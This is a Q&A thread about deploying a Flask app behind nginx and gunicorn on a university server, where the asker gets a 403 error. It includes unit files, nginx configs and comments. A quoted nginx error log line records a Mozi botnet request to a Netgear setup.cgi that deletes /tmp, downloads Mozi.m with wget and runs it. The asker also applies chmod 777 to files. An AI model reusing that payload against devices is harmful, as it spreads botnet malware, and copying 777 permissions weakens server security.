0

I have a flask website running fine in a flask development server at http://0.0.0.0:8080. I need to deploy it to my university server. I have the public IP of the server, and I mapped it to my domain I bought from freenom.com. enter image description here

I am new to nginx. I referred to this and this to deploy the website.

now I am getting error 403 You don't have permission to access / on this server when I try to open the website in the browser.

My project structure is:

myproject
|________ app.py
|________ app.sock
|________ wsgi.py
|________ app.ini
|________ templates
          |__________ index.html

app.py ends with app.run(host="0.0.0.0", port=8080, debug=True). The file wsgi.py is exactly same as the one mentioned in the references.

app.ini contains

[uwsgi]
module = wsgi:app

master = true
processes = 5

socket = app.sock
chmod-socket = 660
vacuum = true

die-on-term = true

The file /etc/systemd/system/app.service contains

[Unit]
Description=Gunicorn instance to serve myprojects
After=network.target

[Service]
User=my_username_on_server
Group=www-data

WorkingDirectory=/home/my_username_on_server/git/myproject
Environment="PATH=/home/my_username_on_server/ritwikEnvs/myproject/bin"

ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
# I also tried the following
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --workers 3 --bind unix:app.sock -m 007 wsgi:app
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/uwsgi --ini app.ini 

[Install]
WantedBy=multi-user.target

When I execute sudo systemctl start app, the app.sock file is created automatically.

/etc/nginx/sites-available/app contains

server {
    listen 80;
# tried this also
# listen 0.0.0.0;
# listen 127.0.0.1
    server_name mydomainname.ml www.mydomainname.ml;
# tried this also
# server_name localhost

location / {
  include proxy_params;
  proxy_pass http://0.0.0.0:8080;
# i also tried with
# proxy_pass http://127.0.0.1:8080;
# proxy_pass http://public_IP_of_server:8080;
# proxy_pass http://unix:/home/my_username_on_server/git/myproject/app.sock;
# uwsgi_pass unix:/home/my_username_on_server/git/myproject/app.sock;
# uwsgi_pass unix:///home/my_username_on_server/git/myproject/app.sock;
    }
}

/etc/nginx/nginx.conf contains

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
        # multi_accept on;
}

http {
        client_max_body_size 100M;
        ##
        # Basic Settings
        ##

        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        # server_tokens off;

        # server_names_hash_bucket_size 64;
        # server_name_in_redirect off;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ##
        # SSL Settings
        ##

        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        ##
        # Logging Settings
        ##

        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;

        ##
        # Gzip Settings
        ##
        gzip on;

        # gzip_vary on;
        # gzip_proxied any;
        # gzip_comp_level 6;
        # gzip_buffers 16 8k;
        # gzip_http_version 1.1;
        # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

        ##
        # Virtual Host Configs
        ##

        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}


#mail {
#       # See sample authentication script at:
#       # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
#       # auth_http localhost/auth.php;
#       # pop3_capabilities "TOP" "USER";
#       # imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
#       server {
#               listen     localhost:110;
#               protocol   pop3;
#               proxy      on;
#       }
# 
#       server {
#               listen     localhost:143;
#               protocol   imap;
#               proxy      on;
#       }
#}

Then I make the soft link by sudo ln -s /etc/nginx/sites-available/app /etc/nginx/sites-enabled

Then

$ sudo nginx -t

nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

$ sudo systemctl restart nginx
$ sudo ufw allow 'Nginx Full'

I tried changing the permissions:

sudo chmod -R 777 /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R sat:www-data /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R www-data:www-data /usr/share/nginx/html/*
sudo chmod -R 0755 /usr/share/nginx/html/*

Nothing helped.

The flask website is running fine

$ sudo systemctl status app

● app.service - Gunicorn instance to serve myprojects
   Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2020-09-22 17:18:37 IST; 19min ago
 Main PID: 6437 (gunicorn)
    Tasks: 82 (limit: 19660)
   CGroup: /system.slice/app.service
           ├─6437 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
           └─6463 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
... ... <console statements which proves that website is running>

$ curl -XGET http://0.0.0.0:8080 

<shows the source code of index.html>

Logs

$ sudo cat /var/log/nginx/error.log | grep mydomainname

2020/09/22 13:55:47 [error] 4261#4261: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 202.83.45.214, server: mydomainname.ml, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0", upstream: "http://0.0.0.0:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1"

Update: it seems the issue was in the domain name service I was using. It was not able to redirect the requests to public_IP of my server. I used a paid service, and it started working. Rule of thumb: use a good+paid domain service provider.

Ritwik
  • 101
  • 1
  • 2
  • could you try 127.0.0.1:8080 in your proxy_pass directive or private_ip_of_server:8080 with proxy_pass. Also if you want to go with a unix socket. Check the permissions of the app.sock file and if nginx can access it. – Lorem ipsum Sep 22 '20 at 13:01
  • @LukasRäpple tried both, didn't work. Changed the app.sock permission with ```sudo chmod -R 777 app.sock```, didn't help. – Ritwik Sep 22 '20 at 13:33
  • The error you quoted: "You don't have permission to access / on this server" does not come from nginx. It looks like an Apache error. Check you entered the DNS settings correctly and that you do not have unexpected software on your server. – Michael Hampton Sep 22 '20 at 14:07
  • @MichaelHampton sir it seems apache is not even installed on the server. Yet, the server is currently hosting other websites (not written with flask) of my colleagues. They gave me the public_IP of the server which I entered into the DNS. Should apache be installed? Is it absolutely necessary? – Ritwik Sep 22 '20 at 18:54
  • Apache is not necessary, so the question is, why is it there? – Michael Hampton Sep 22 '20 at 19:03
  • @MichaelHampton I don't know – Ritwik Sep 22 '20 at 19:52

0 Answers0